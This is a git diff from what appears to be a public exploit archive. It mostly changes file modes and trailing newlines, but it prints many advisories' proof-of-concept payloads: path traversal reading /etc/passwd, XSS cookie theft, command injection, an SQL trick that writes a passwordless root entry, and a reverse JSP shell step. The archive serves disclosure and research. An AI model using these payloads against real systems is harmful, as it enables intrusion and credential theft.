100644 index 0deb36bb0..5feb43775 --- a/platforms/multiple/remote/21445.txt +++ b/platforms/multiple/remote/21445.txt @@ -6,4 +6,4 @@ An attacker with a valid administrative username and password is able to view an http://ip:1500/CONF&LOG=/etc/passwd&NOIH=no&FRAMES=y -Here the attacker is able to view the contents of /etc/passwd. \ No newline at end of file +Here the attacker is able to view the contents of /etc/passwd. \ No newline at end of file diff --git a/platforms/multiple/remote/21450.txt b/platforms/multiple/remote/21450.txt old mode 100755 new mode 100644 index a1100880a..9a46e186c --- a/platforms/multiple/remote/21450.txt +++ b/platforms/multiple/remote/21450.txt @@ -10,4 +10,4 @@ in qcommon/cmd.c change the line Cmd_TokenizeString (text, true); to -Cmd_TokenizeString( text, false); \ No newline at end of file +Cmd_TokenizeString( text, false); \ No newline at end of file diff --git a/platforms/multiple/remote/21453.txt b/platforms/multiple/remote/21453.txt old mode 100755 new mode 100644 index e8b209318..97f460d9c --- a/platforms/multiple/remote/21453.txt +++ b/platforms/multiple/remote/21453.txt @@ -12,4 +12,4 @@ It is possible for a malicious remote user to exploit this issue by crafting a U bannerserver.gator.com/<SCRIPT>window.location.href="http://www.offroadwarehouse.com";</SCRIPT> -The script code will redirect a user to a different site. \ No newline at end of file +The script code will redirect a user to a different site. \ No newline at end of file diff --git a/platforms/multiple/remote/21490.txt b/platforms/multiple/remote/21490.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21491.txt b/platforms/multiple/remote/21491.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21492.txt b/platforms/multiple/remote/21492.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21511.c b/platforms/multiple/remote/21511.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21559.c b/platforms/multiple/remote/21559.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21560.c b/platforms/multiple/remote/21560.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21603.txt b/platforms/multiple/remote/21603.txt old mode 100755 new mode 100644 index 5f9ce4cdf..a6ba90963 --- a/platforms/multiple/remote/21603.txt +++ b/platforms/multiple/remote/21603.txt @@ -4,4 +4,4 @@ The iPlanet Web Server search engine is prone to a file disclosure vulnerability This issue was reported for iPlanet Web Server on Microsoft Windows operating systems. Since the server typically runs in the SYSTEM context on these operating systems, it may be possible for an attacker to disclose the contents of arbitrary files. It has not been confirmed whether this vulnerability exists on other platforms that the software is compatible with. The search engine functionality does not appear to be available for versions of the software on Linux platforms. -GET /search?NS-query-pat=..\..\..\..\..\boot.ini \ No newline at end of file +GET /search?NS-query-pat=..\..\..\..\..\boot.ini \ No newline at end of file diff --git a/platforms/multiple/remote/21627.txt b/platforms/multiple/remote/21627.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21638.txt b/platforms/multiple/remote/21638.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21649.txt b/platforms/multiple/remote/21649.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21751.txt b/platforms/multiple/remote/21751.txt old mode 100755 new mode 100644 index a57a3065e..538a54d13 --- a/platforms/multiple/remote/21751.txt +++ b/platforms/multiple/remote/21751.txt @@ -5,4 +5,4 @@ Blazix is a freely available, open source web server written in Java. It is avai When a user passes a request to the web server that ends in either a plus (+) or backslash (\), the web server may react unpredictably. This type of character appended to the name of a .jsp file has been reported to reveal the contents of the .jsp file. http://www.example.com/jsptest.jsp+ -http://www.example.com/jsptest.jsp\ \ No newline at end of file +http://www.example.com/jsptest.jsp\ \ No newline at end of file diff --git a/platforms/multiple/remote/21752.txt b/platforms/multiple/remote/21752.txt old mode 100755 new mode 100644 index d487b7cb5..1727ce7c3 --- a/platforms/multiple/remote/21752.txt +++ b/platforms/multiple/remote/21752.txt @@ -5,4 +5,4 @@ Blazix is a freely available, open source web server written in Java. It is avai Blazix does not properly handle some special characters when appended to requests. By passing a special character with a request to the web server, it is possible for a user to gain access to a listing of a password protected directory. This could result in information disclosure, and could potentially be used to gain intelligence in launching an attack against a system. http://www.example.com/bugtest+/ -http://www.example.com/bugtest\/ \ No newline at end of file +http://www.example.com/bugtest\/ \ No newline at end of file diff --git a/platforms/multiple/remote/21767.txt b/platforms/multiple/remote/21767.txt old mode 100755 new mode 100644 index e942fcfd0..304895bce --- a/platforms/multiple/remote/21767.txt +++ b/platforms/multiple/remote/21767.txt @@ -4,4 +4,4 @@ NullLogic Null HTTPd is a small multithreaded webserver for Linux and Windows. It is possible for attackers to construct a URL that will cause scripting code to be embedded in error pages. As a result, when an innocent user follows such a link, the script code will execute within the context of the hosted site. -http://localhost/a?x=<SCRIPT>alert(document.URL)</SCRIPT> \ No newline at end of file +http://localhost/a?x=<SCRIPT>alert(document.URL)</SCRIPT> \ No newline at end of file diff --git a/platforms/multiple/remote/21800.txt b/platforms/multiple/remote/21800.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21801.txt b/platforms/multiple/remote/21801.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21876.txt b/platforms/multiple/remote/21876.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21880.txt b/platforms/multiple/remote/21880.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21885.txt b/platforms/multiple/remote/21885.txt old mode 100755 new mode 100644 index d72234eeb..47558e91c --- a/platforms/multiple/remote/21885.txt +++ b/platforms/multiple/remote/21885.txt @@ -7,4 +7,4 @@ Attacker-supplied HTML and script code may be executed on a web client visiting Attacks of this nature may make it possible for attackers to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user. http://%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28document%2Ecookie%29%22 -%3E.apachesite.org/raise_404 \ No newline at end of file +%3E.apachesite.org/raise_404 \ No newline at end of file diff --git a/platforms/multiple/remote/21942.java b/platforms/multiple/remote/21942.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/21996.txt b/platforms/multiple/remote/21996.txt old mode 100755 new mode 100644 index b6f55f890..ac6fd068d --- a/platforms/multiple/remote/21996.txt +++ b/platforms/multiple/remote/21996.txt @@ -5,4 +5,4 @@ Lotus Domino reportedly discloses sensitive banner information when a non-existe This issue is present on Lotus Domino Server with the 'DominoNoBanner' set to a value of '1'. -http://www.example.com/nosuchdb.nsf \ No newline at end of file +http://www.example.com/nosuchdb.nsf \ No newline at end of file diff --git a/platforms/multiple/remote/22029.txt b/platforms/multiple/remote/22029.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22093.py b/platforms/multiple/remote/22093.py index 3f7ebb70e..1cacd37ee 100755 --- a/platforms/multiple/remote/22093.py +++ b/platforms/multiple/remote/22093.py @@ -130,5 +130,4 @@ print "[*] Sending evil payload" resp = opener.open("http://%s:6262/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP" %rhost, post_params) print "[*] Created Reverse JSP shell http://%s:6262/%s" % (rhost,filename) resp = opener.open("http://%s:6262/%s" % (rhost,filename)) -print "[*] Check your shell on %s %s\n" % (lhost,lport) - \ No newline at end of file +print "[*] Check your shell on %s %s\n" % (lhost,lport) \ No newline at end of file diff --git a/platforms/multiple/remote/22130.txt b/platforms/multiple/remote/22130.txt old mode 100755 new mode 100644 index 1c791a982..03f465c92 --- a/platforms/multiple/remote/22130.txt +++ b/platforms/multiple/remote/22130.txt @@ -4,4 +4,4 @@ AN HTTPD does not adequately filter HTML code thus making it prone to cross-site This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. -http://www.target.com/[script]?<h1>HACKED</h1>aaaa..[up_to_1kb]..aaaa \ No newline at end of file +http://www.target.com/[script]?<h1>HACKED</h1>aaaa..[up_to_1kb]..aaaa \ No newline at end of file diff --git a/platforms/multiple/remote/22138.c b/platforms/multiple/remote/22138.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22139.c b/platforms/multiple/remote/22139.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22140.c b/platforms/multiple/remote/22140.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22145.txt b/platforms/multiple/remote/22145.txt old mode 100755 new mode 100644 index 5af9b3fe7..59135c038 --- a/platforms/multiple/remote/22145.txt +++ b/platforms/multiple/remote/22145.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6588/info It has been reported that BitKeeper is vulnerable to an input validation bug. When the software is run in daemon mode, it starts a service with an interface that can be connected to via HTTP. By sending specially crafted input to the service, it is possible to execute abitrary commands. -http://www.example.com:port/diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c \ No newline at end of file +http://www.example.com:port/diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c \ No newline at end of file diff --git a/platforms/multiple/remote/22178.xml b/platforms/multiple/remote/22178.xml old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22200.txt b/platforms/multiple/remote/22200.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22201.txt b/platforms/multiple/remote/22201.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22224.txt b/platforms/multiple/remote/22224.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22296.txt b/platforms/multiple/remote/22296.txt old mode 100755 new mode 100644 index 4fd721bac..78f2c3bf8 --- a/platforms/multiple/remote/22296.txt +++ b/platforms/multiple/remote/22296.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6980/info It has been reported that the Axis Video Server does not properly secure sensitive information. Because of this, an attacker may be able to gather details about server operation and traffic that could lead to further attacks. -http://www.example.com/support/messages \ No newline at end of file +http://www.example.com/support/messages \ No newline at end of file diff --git a/platforms/multiple/remote/22327.txt b/platforms/multiple/remote/22327.txt old mode 100755 new mode 100644 index 612b6377a..be3a17b64 --- a/platforms/multiple/remote/22327.txt +++ b/platforms/multiple/remote/22327.txt @@ -9,4 +9,4 @@ Although unconfirmed, it is possible that this issue also affects other HTTP con telnet www.blockedsite.com 80 GET / HTTP/1.1 -Host: www.blockedsite.com \ No newline at end of file +Host: www.blockedsite.com \ No newline at end of file diff --git a/platforms/multiple/remote/22381.txt b/platforms/multiple/remote/22381.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22388.txt b/platforms/multiple/remote/22388.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22409.txt b/platforms/multiple/remote/22409.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22462.txt b/platforms/multiple/remote/22462.txt old mode 100755 new mode 100644 index c409036f3..0485c9707 --- a/platforms/multiple/remote/22462.txt +++ b/platforms/multiple/remote/22462.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/7291/info A vulnerability has been reported for Interbase that may result in the corruption of arbitrary system files. The vulnerability exists due to insufficient checks performed when creating or manipulating external databases. create table test external '/etc/passwd' (id char(80)); -insert into test values('r00t::0:0:root:/root:/bin/bash'); \ No newline at end of file +insert into test values('r00t::0:0:root:/root:/bin/bash'); \ No newline at end of file diff --git a/platforms/multiple/remote/22472.txt b/platforms/multiple/remote/22472.txt old mode 100755 new mode 100644 index a10e03de8..8678e25fd --- a/platforms/multiple/remote/22472.txt +++ b/platforms/multiple/remote/22472.txt @@ -6,4 +6,4 @@ If a specially crafted request is made for a page that accepts user-supplied dat The information gathered in this way may be used to mount further attacks against the system. -https://www.example.com/securelogin/1,2345,A,00.html?Errmessage="x214>x214 \ No newline at end of file +https://www.example.com/securelogin/1,2345,A,00.html?Errmessage="x214>x214 \ No newline at end of file diff --git a/platforms/multiple/remote/22496.txt b/platforms/multiple/remote/22496.txt old mode 100755 new mode 100644 index 5c9d2f2b9..536239c83 --- a/platforms/multiple/remote/22496.txt +++ b/platforms/multiple/remote/22496.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7353/info It has been reported that the Python Documentation Server is vulnerable to a cross-site scripting problem in error pages. Because of this, an attacker could potentially cause the execution of malicious HTML and script code in the browser of a web user. -http://www.example.com:7464/<script>example</script> \ No newline at end of file +http://www.example.com:7464/<script>example</script> \ No newline at end of file diff --git a/platforms/multiple/remote/22497.txt b/platforms/multiple/remote/22497.txt old mode 100755 new mode 100644 index db2bd59e1..8aaa353ee --- a/platforms/multiple/remote/22497.txt +++ b/platforms/multiple/remote/22497.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7355/info When certain malformed URL requests are sent to a 12Planet Chat Server, the server's installation path may be revealed in the returned error message. This information could be used by a remote attacker to launch further attacks against the chat server. -http://www.victim.com:8080/qwe/qwe/qwe/index.html \ No newline at end of file +http://www.victim.com:8080/qwe/qwe/qwe/index.html \ No newline at end of file diff --git a/platforms/multiple/remote/22509.txt b/platforms/multiple/remote/22509.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22611.txt b/platforms/multiple/remote/22611.txt old mode 100755 new mode 100644 index 095280365..c515f6f68 --- a/platforms/multiple/remote/22611.txt +++ b/platforms/multiple/remote/22611.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/7621/info A vulnerability has been reported for Netscape Enterprise Server. The problem is said to occur while processing HTTP queries containing the '?PageServices' URI parameter. After processing this query the affected server may disclose the contents of established web root, possibly including sub-directories. -http://www.example.com/?PageServices \ No newline at end of file +http://www.example.com/?PageServices \ No newline at end of file diff --git a/platforms/multiple/remote/22649.txt b/platforms/multiple/remote/22649.txt old mode 100755 new mode 100644 index 8d80e233e..96787091d --- a/platforms/multiple/remote/22649.txt +++ b/platforms/multiple/remote/22649.txt @@ -4,4 +4,4 @@ A vulnerability has been reported that could enable a P-News member to create an This issue was reported in P-News 1.16. Other versions may also be affected. -Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-||-|179ad45c6ce2cb97cf1029e212046e81|-|2|-|peter@aol.com|-| \ No newline at end of file +Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-||-|179ad45c6ce2cb97cf1029e212046e81|-|2|-|peter@aol.com|-| \ No newline at end of file diff --git a/platforms/multiple/remote/22662.txt b/platforms/multiple/remote/22662.txt old mode 100755 new mode 100644 index ab00a01a1..5ee4cb573 --- a/platforms/multiple/remote/22662.txt +++ b/platforms/multiple/remote/22662.txt @@ -10,4 +10,4 @@ The following script code has been provided to demonstrate indirect session hija function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText; -"xmldoc" can be redirected with a "img src", "window.open", to the attacker machine. \ No newline at end of file +"xmldoc" can be redirected with a "img src", "window.open", to the attacker machine. \ No newline at end of file diff --git a/platforms/multiple/remote/22751.txt b/platforms/multiple/remote/22751.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/22755.txt b/platforms/multiple/remote/22755.txt old mode 100755 new mode 100644 index c67bc3378..bc7d17253 --- a/platforms/multiple/remote/22755.txt +++ b/platforms/multiple/remote/22755.txt @@ -4,4 +4,4 @@ A weakness has been discovered in Aiglon Web Server, which may provide for the d It has been reported that a remote attacker may cause the web server to disclose installation path details by making a malformed HTTP request. The remote attacker may potentially use the disclosed information to aid in further "intelligent" attacks against the host running the affected software. -http://www.example.com/index.html* \ No newline at end of file +http://www.example.com/index.html* \ No newline at end of file diff --git a/platforms/multiple/remote/22994.txt b/platforms/multiple/remote/22994.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23024.txt b/platforms/multiple/remote/23024.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23069.txt b/platforms/multiple/remote/23069.txt old mode 100755 new mode 100644 index cd7de5044..cbab62725 --- a/platforms/multiple/remote/23069.txt +++ b/platforms/multiple/remote/23069.txt @@ -7,4 +7,4 @@ http://www.server.name/scripts/wgate/pbw2/!? with params: ~runtimemode=DM& ~language=en& -~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx& \ No newline at end of file +~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx& \ No newline at end of file diff --git a/platforms/multiple/remote/23070.txt b/platforms/multiple/remote/23070.txt old mode 100755 new mode 100644 index 861805531..e65d35e93 --- a/platforms/multiple/remote/23070.txt +++ b/platforms/multiple/remote/23070.txt @@ -12,4 +12,4 @@ with params: ~theme=..\..& ~template=services\global.srvc+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -(where "+" stands for spaces "%20" uri encoded). \ No newline at end of file +(where "+" stands for spaces "%20" uri encoded). \ No newline at end of file diff --git a/platforms/multiple/remote/23071.txt b/platforms/multiple/remote/23071.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23136.txt b/platforms/multiple/remote/23136.txt old mode 100755 new mode 100644 index ed92eee2e..365f065ae --- a/platforms/multiple/remote/23136.txt +++ b/platforms/multiple/remote/23136.txt @@ -4,4 +4,4 @@ It has been reported that FutureWave WebX Server may be prone to a directory tra This vulnerablity may allow an attacker to gain access to sensitive data that may be used to launch further attacks. -http://[victim]/../../../anyfile \ No newline at end of file +http://[victim]/../../../anyfile \ No newline at end of file diff --git a/platforms/multiple/remote/23137.txt b/platforms/multiple/remote/23137.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23173.txt b/platforms/multiple/remote/23173.txt old mode 100755 new mode 100644 index c0bbc2449..1616df058 --- a/platforms/multiple/remote/23173.txt +++ b/platforms/multiple/remote/23173.txt @@ -4,4 +4,4 @@ It has been reported that a vulnerability present in TCLHttpd allows for attacke The discoverer of this vulnerability has stated that version 3.4.2 is affected. It is likely that prior versions are also vulnerable. -http://example/images/?pattern=/*&sort=name \ No newline at end of file +http://example/images/?pattern=/*&sort=name \ No newline at end of file diff --git a/platforms/multiple/remote/23174.txt b/platforms/multiple/remote/23174.txt old mode 100755 new mode 100644 index a1f74ec93..b67fdd44e --- a/platforms/multiple/remote/23174.txt +++ b/platforms/multiple/remote/23174.txt @@ -7,4 +7,4 @@ The discoverer of this vulnerability has stated that version 3.4.2 is affected. http://example/debug/echo?name=<script>alert('hello');</script> http://example/debug/dbg?host=<script>alert('hello');</script> http://example/debug/showproc?proc=<script>alert('hello');</script> -http://example/debug/errorInfo?title=<script>alert('hello');</script> \ No newline at end of file +http://example/debug/errorInfo?title=<script>alert('hello');</script> \ No newline at end of file diff --git a/platforms/multiple/remote/23176.txt b/platforms/multiple/remote/23176.txt old mode 100755 new mode 100644 index b1a19016b..b3c757a15 --- a/platforms/multiple/remote/23176.txt +++ b/platforms/multiple/remote/23176.txt @@ -34,4 +34,4 @@ Can't Parse Request. <HR> <ADDRESS>Null httpd 0.5.1</ADDRESS> </BODY></HTML> ----- \ No newline at end of file +---- \ No newline at end of file diff --git a/platforms/multiple/remote/23199.c b/platforms/multiple/remote/23199.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23221.txt b/platforms/multiple/remote/23221.txt old mode 100755 new mode 100644 index 9bffbc002..f6121e47c --- a/platforms/multiple/remote/23221.txt +++ b/platforms/multiple/remote/23221.txt @@ -25,4 +25,4 @@ CALL COMPDEBUG(true); CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe'); CALL COMPILE('/c REGEDIT.EXE',''); </sql> -</target> \ No newline at end of file +</target> \ No newline at end of file diff --git a/platforms/multiple/remote/23230.txt b/platforms/multiple/remote/23230.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23257.txt b/platforms/multiple/remote/23257.txt old mode 100755 new mode 100644 index b1e796df1..cbc983fb5 --- a/platforms/multiple/remote/23257.txt +++ b/platforms/multiple/remote/23257.txt @@ -7,4 +7,4 @@ It has been reported that a remote attacker may construct a malicious link conta http://www.example.com/cgi/bin/test.txt?<script>alert(document.cookie)</script> POST /servlet/custMsg?guestName=<script>alert("bang")</script> HTTP/1.0 POST /servlet/CookieExample?cookiename=<script>alert("bang")</script>&cookievalue=&cookiepath= -HTTP/1.0 \ No newline at end of file +HTTP/1.0 \ No newline at end of file diff --git a/platforms/multiple/remote/23271.txt b/platforms/multiple/remote/23271.txt old mode 100755 new mode 100644 index 445a114cb..fc800a786 --- a/platforms/multiple/remote/23271.txt +++ b/platforms/multiple/remote/23271.txt @@ -6,4 +6,4 @@ Successful exploitation of this attack may allow an attacker to steal cookie-bas PSCS VPOP3 versions 2.0.0e and 2.0.0f have been reported to be prone to this vulnerability, however other versions may be affected as well. -index.html?redirect=admin/index.html";%0Devil_script;%0D// \ No newline at end of file +index.html?redirect=admin/index.html";%0Devil_script;%0D// \ No newline at end of file diff --git a/platforms/multiple/remote/23282.txt b/platforms/multiple/remote/23282.txt old mode 100755 new mode 100644 index ec2807a39..66716b891 --- a/platforms/multiple/remote/23282.txt +++ b/platforms/multiple/remote/23282.txt @@ -6,4 +6,4 @@ This vulnerability may be successfully exploited to gain sensitive information a Apache Cocoon version 2.1 and 2.2 before 22 Oct 2003 have been reported to be affected by this issue, however other versions may be affected as well. -http://www.example.com:8888/samples/view-source?filename=../../../[existing_file] \ No newline at end of file +http://www.example.com:8888/samples/view-source?filename=../../../[existing_file] \ No newline at end of file diff --git a/platforms/multiple/remote/23291.txt b/platforms/multiple/remote/23291.txt old mode 100755 new mode 100644 index 67b512893..a9343fa68 --- a/platforms/multiple/remote/23291.txt +++ b/platforms/multiple/remote/23291.txt @@ -4,4 +4,4 @@ A flaw in the Opera web browsers security model has been discovered that could a **UPDATE: The vendor has contacted Symantec and has stated that this is not a vulnerability. Symantec has not been able to reproduce the claims made by the individual who reported this issue. This record is being retired, though it may be re-activated if further findings confirm existence of the vulnerability. -<iframe name="abc" src="file:///C:/"></iframe> \ No newline at end of file +<iframe name="abc" src="file:///C:/"></iframe> \ No newline at end of file diff --git a/platforms/multiple/remote/23307.txt b/platforms/multiple/remote/23307.txt old mode 100755 new mode 100644 index 6f03b0a44..f2241cf5a --- a/platforms/multiple/remote/23307.txt +++ b/platforms/multiple/remote/23307.txt @@ -6,4 +6,4 @@ Successful exploitation of this attack may allow an attacker to steal cookie-bas NetFile FTP/Webserver Version 6.0.3.588 has been reported to be prone to this issue, however other versions may be affected as well. -http://www.example.com/<script>alert("bang")</script> \ No newline at end of file +http://www.example.com/<script>alert("bang")</script> \ No newline at end of file diff --git a/platforms/multiple/remote/23309.txt b/platforms/multiple/remote/23309.txt old mode 100755 new mode 100644 index 83f1ec99f..b0106d676 --- a/platforms/multiple/remote/23309.txt +++ b/platforms/multiple/remote/23309.txt @@ -9,4 +9,4 @@ Successful exploitation of this issue result in disclosure of sensitive informat This problem has been reported to exist in FirstClass 7.1. It is possible that other versions are affected as well. http://www.example.com/Search -http://www.example.com/~Account%20Name/Search \ No newline at end of file +http://www.example.com/~Account%20Name/Search \ No newline at end of file diff --git a/platforms/multiple/remote/23320.txt b/platforms/multiple/remote/23320.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23380.txt b/platforms/multiple/remote/23380.txt old mode 100755 new mode 100644 index 97ea1f01a..e35335cb8 --- a/platforms/multiple/remote/23380.txt +++ b/platforms/multiple/remote/23380.txt @@ -4,4 +4,4 @@ It has been reported that a cross-site scripting vulnerability may exist in WebW WebWasher Classic versions 3.3 Build 44 and 2.2.1 are reported to be prone to this issue, however other versions may be affected as well. -http://www.example.com/<script>alert("WASH_ME")</script> \ No newline at end of file +http://www.example.com/<script>alert("WASH_ME")</script> \ No newline at end of file diff --git a/platforms/multiple/remote/23385.txt b/platforms/multiple/remote/23385.txt old mode 100755 new mode 100644 index 59778902c..a5ad0c9b2 --- a/platforms/multiple/remote/23385.txt +++ b/platforms/multiple/remote/23385.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9055/info PostMaster has been reported prone to a cross-site scripting vulnerability. The issue presents itself due to a lack of sufficient sanitization that is performed by the proxy service on user-supplied data. An attacker may construct a malicious HTTP request link that contains embedded HTML and script code. When this request is handled by the proxy service, the malicious HTML and script code contained in the request will be incorporated into an error page and in turn will be rendered in the browser of a user who follows the link. -http://www.example.com/<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/multiple/remote/23396.txt b/platforms/multiple/remote/23396.txt old mode 100755 new mode 100644 index 0d2a0b052..38acfbea9 --- a/platforms/multiple/remote/23396.txt +++ b/platforms/multiple/remote/23396.txt @@ -4,4 +4,4 @@ sircd has been reported prone to a privilege escalation vulnerability. It has be An attacker may exploit this condition to hijack IRC channels or impersonate users, these privileges may aid the attacker in further attacks launched against the target server. -MODE <nick> +o \ No newline at end of file +MODE <nick> +o \ No newline at end of file diff --git a/platforms/multiple/remote/23404.c b/platforms/multiple/remote/23404.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23405.c b/platforms/multiple/remote/23405.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23433.txt b/platforms/multiple/remote/23433.txt old mode 100755 new mode 100644 index 4be84b78c..0f79910bb --- a/platforms/multiple/remote/23433.txt +++ b/platforms/multiple/remote/23433.txt @@ -4,4 +4,4 @@ It has been discovered that the Mozilla browser is prone to a URI obfuscation we This could be used in conjunction with other URI obfuscation attacks and browser vulnerabilities to trick a user into following a malicious link. -http://www.trusted.com%00@www.malicious.com \ No newline at end of file +http://www.trusted.com%00@www.malicious.com \ No newline at end of file diff --git a/platforms/multiple/remote/23439.txt b/platforms/multiple/remote/23439.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23541.c b/platforms/multiple/remote/23541.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23542.c b/platforms/multiple/remote/23542.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23557.txt b/platforms/multiple/remote/23557.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23563.txt b/platforms/multiple/remote/23563.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23564.txt b/platforms/multiple/remote/23564.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23583.txt b/platforms/multiple/remote/23583.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23593.txt b/platforms/multiple/remote/23593.txt old mode 100755 new mode 100644 index 13c1d893b..0c5e0924e --- a/platforms/multiple/remote/23593.txt +++ b/platforms/multiple/remote/23593.txt @@ -4,4 +4,4 @@ Oracle HTTP Server is reportedly prone to a cross-site scripting issue. This cou http://<host>/isqlplus?action=logon&username=sdfds%22%3e%3cscript%3ealert('XSS')%3c/script%3e\&password=dsfsd%3cscript%3ealert('XSS')%3c/script%3e -http://<host>/isqlplus?action=<script>alert('XSS')</script> \ No newline at end of file +http://<host>/isqlplus?action=<script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/multiple/remote/23598.txt b/platforms/multiple/remote/23598.txt old mode 100755 new mode 100644 index d20531be7..2463fada8 --- a/platforms/multiple/remote/23598.txt +++ b/platforms/multiple/remote/23598.txt @@ -4,4 +4,4 @@ IBM Net.Data is prone to cross-site scripting attacks via error message output. Exploitation could permit theft of cookie-based authentication credentials or other attacks. -http://www.example.com/cgi-bin/db2www/<script>alert(document.domain)</script>/A \ No newline at end of file +http://www.example.com/cgi-bin/db2www/<script>alert(document.domain)</script>/A \ No newline at end of file diff --git a/platforms/multiple/remote/23600.txt b/platforms/multiple/remote/23600.txt old mode 100755 new mode 100644 index 6333e6b9b..3b0161139 --- a/platforms/multiple/remote/23600.txt +++ b/platforms/multiple/remote/23600.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9491/info BremsServer has been reported to contain cross-site scripting vulnerabilities. This issue is due to the server failing to check or filter user strings that are sent to the server. An attacker may exploit these issues by creating a link that includes embedded malicious HTML and script code and enticing a user to follow it. -http://www.example.com/<script>alert("Test")</script> \ No newline at end of file +http://www.example.com/<script>alert("Test")</script> \ No newline at end of file diff --git a/platforms/multiple/remote/23707.txt b/platforms/multiple/remote/23707.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23756.txt b/platforms/multiple/remote/23756.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23873.c b/platforms/multiple/remote/23873.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/23893.txt b/platforms/multiple/remote/23893.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24030.c b/platforms/multiple/remote/24030.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24032.txt b/platforms/multiple/remote/24032.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24040.txt b/platforms/multiple/remote/24040.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24041.c b/platforms/multiple/remote/24041.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24137.txt b/platforms/multiple/remote/24137.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24148.txt b/platforms/multiple/remote/24148.txt old mode 100755 new mode 100644 index 610d10de4..dbb718d01 --- a/platforms/multiple/remote/24148.txt +++ b/platforms/multiple/remote/24148.txt @@ -5,4 +5,4 @@ It is reported that Java System Application Server is prone to a remote installa Successful exploitation of this issue may allow an attacker to gain sensitive information about the file system that may aid in launching more direct attacks against the system. http://www.example.com:8080//// -http://www.example.com:8080////CON \ No newline at end of file +http://www.example.com:8080////CON \ No newline at end of file diff --git a/platforms/multiple/remote/24189.html b/platforms/multiple/remote/24189.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24224.c b/platforms/multiple/remote/24224.c old mode 100755 new mode 100644 diff 